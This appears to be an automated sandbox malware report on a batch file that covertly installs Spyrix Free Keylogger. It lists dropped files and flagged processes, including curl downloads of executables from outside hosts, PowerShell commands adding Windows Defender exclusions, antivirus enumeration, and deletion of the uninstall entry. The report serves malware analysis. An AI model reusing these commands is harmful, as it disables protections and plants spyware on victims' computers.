C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\REG3F6B.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\REG95D8.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qgsnw1d.3af.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pstvsra.bew.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2oyelmsj.gd5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rdgl13t.r3s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rfsgzlt.ifd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zhu2no2.iaq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aviv0d1.np4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdmr2xr2.jw2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjdkxr3d.rah.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmeu3oyt.xfz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bni1ewuh.asi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu30zysp.uni.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dezggigv.1vn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhgqfpnz.xrp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etpwzy1q.qzx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5olrizu.2og.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3bdmdtl.aio.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gf22wybw.5bd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqyd213x.1fv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzemshyw.3gi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhhf303o.vw5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyn1z5vk.bpc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzozcwxe.hlf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrrsj3yb.nhx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1iszat0.22q.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3dlfxo4.3ja.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcbj4cra.ayk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkylyvok.hh5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpp4jtep.el0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw1pv0fq.qkl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me3y00uj.q44.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzslapqu.o1i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmbom2yc.omv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nueezh51.1v5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pneuaxv2.3ey.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pz4gbeao.mbq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwfagspn.n43.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry2nncu0.vhh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_savfznmk.r0u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spvyfe2m.jqc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szzqmk0b.2ee.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u50vidua.i4k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfpm0fxm.ib1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w44pzcih.o1e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wq140kky.xr5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xg05ce.1u4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbecxiiv.1dz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlajlgw0.zvt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\stld2.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\stld3.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\$ywr34c.tmp
ASCII text, with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\iMsgInfo.bmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\psout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\psout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\sout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\sout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spmmout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spmmout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spsout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spsout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nse
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\sfkname.tmp
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 636
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
downloaded
Chrome Cache Entry: 637
Java source, ASCII text, with very long lines (1184)
downloaded
Chrome Cache Entry: 638
Java source, ASCII text, with very long lines (1184)
dropped
Chrome Cache Entry: 639
Java source, ASCII text, with very long lines (522)
downloaded
Chrome Cache Entry: 640
ASCII text
dropped
Chrome Cache Entry: 641
Java source, ASCII text, with very long lines (612)
dropped
Chrome Cache Entry: 642
ASCII text
downloaded
Chrome Cache Entry: 643
ASCII text, with very long lines (2465)
downloaded
Chrome Cache Entry: 644
ASCII text, with very long lines (773)
downloaded
Chrome Cache Entry: 645
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 646
Java source, ASCII text, with very long lines (3701)
downloaded
Chrome Cache Entry: 647
ASCII text, with very long lines (628)
dropped
Chrome Cache Entry: 648
Java source, ASCII text, with very long lines (612)
downloaded
Chrome Cache Entry: 649
ASCII text, with very long lines (1097)
dropped
Chrome Cache Entry: 650
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
dropped
Chrome Cache Entry: 651
ASCII text
downloaded
Chrome Cache Entry: 652
Java source, ASCII text, with very long lines (4588)
dropped
Chrome Cache Entry: 653
Java source, ASCII text, with very long lines (4588)
downloaded
Chrome Cache Entry: 654
Java source, ASCII text, with very long lines (1391)
dropped
Chrome Cache Entry: 655
ASCII text, with very long lines (773)
dropped
Chrome Cache Entry: 656
Java source, Unicode text, UTF-8 text, with very long lines (731)
downloaded
Chrome Cache Entry: 657
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
downloaded
Chrome Cache Entry: 658
ASCII text, with very long lines (1512)
downloaded
Chrome Cache Entry: 659
ASCII text
downloaded
Chrome Cache Entry: 660
ASCII text, with very long lines (3064)
downloaded
Chrome Cache Entry: 661
ASCII text
downloaded
Chrome Cache Entry: 662
C++ source, Unicode text, UTF-8 text
downloaded
Chrome Cache Entry: 663
ASCII text, with very long lines (5945)
dropped
Chrome Cache Entry: 664
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
downloaded
Chrome Cache Entry: 665
Java source, Unicode text, UTF-8 text, with very long lines (731)
dropped
Chrome Cache Entry: 666
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 667
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
downloaded
Chrome Cache Entry: 668
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
downloaded
Chrome Cache Entry: 669
ASCII text
downloaded
Chrome Cache Entry: 670
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
dropped
Chrome Cache Entry: 671
ASCII text
dropped
Chrome Cache Entry: 672
ASCII text, with very long lines (628)
downloaded
Chrome Cache Entry: 673
ASCII text, with very long lines (1097)
downloaded
Chrome Cache Entry: 674
HTML document, ASCII text
downloaded
Chrome Cache Entry: 675
C++ source, Unicode text, UTF-8 text
dropped
Chrome Cache Entry: 676
ASCII text, with very long lines (2720)
downloaded
Chrome Cache Entry: 677
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 678
Java source, ASCII text, with very long lines (1391)
downloaded
Chrome Cache Entry: 679
Java source, Unicode text, UTF-8 text, with very long lines (5161)
downloaded
Chrome Cache Entry: 680
ASCII text, with very long lines (5945)
downloaded
Chrome Cache Entry: 681
Java source, Unicode text, UTF-8 text, with very long lines (5161)
dropped
Chrome Cache Entry: 682
Java source, ASCII text, with very long lines (837)
downloaded
Chrome Cache Entry: 683
Java source, ASCII text, with very long lines (795)
downloaded
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 1033 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
malicious
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-19\Environment"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
malicious
C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe
"C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
malicious
C:\Windows\SysWOW64\reg.exe
reg query "HKU\S-1-5-19\Environment"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
malicious
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe
"C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
malicious
C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp
"C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
malicious
C:\Windows\SysWOW64\regedit.exe
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
malicious
C:\Windows\SysWOW64\reg.exe
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c plist.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
malicious
C:\Windows\SysWOW64\NETSTAT.EXE
netstat.exe -e
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 83
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 112
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 121
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 114
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 105
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 120
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\timeout.exe
timeout 20
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "spm"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
There are 70 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.jrsoftware.org/0
unknown
https://dashboard.spyrix.com/account/login-from-program?email=
unknown
https://api.dropbox.com/1/fileops/copy
unknown
https://dashboard.spyrix.com/account/login-from-program
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exev
unknown
https://spyrix.net/usr/monitor/
unknown
https://Spyrix.net/dashboard/prg-list
158.69.117.119
https://spyrix.net/dashboard/p
unknown
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkU
unknown
http://www.indyproject.org/
unknown
https://spyrix.net/dashboard/prg-actionseDrive
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
unknown
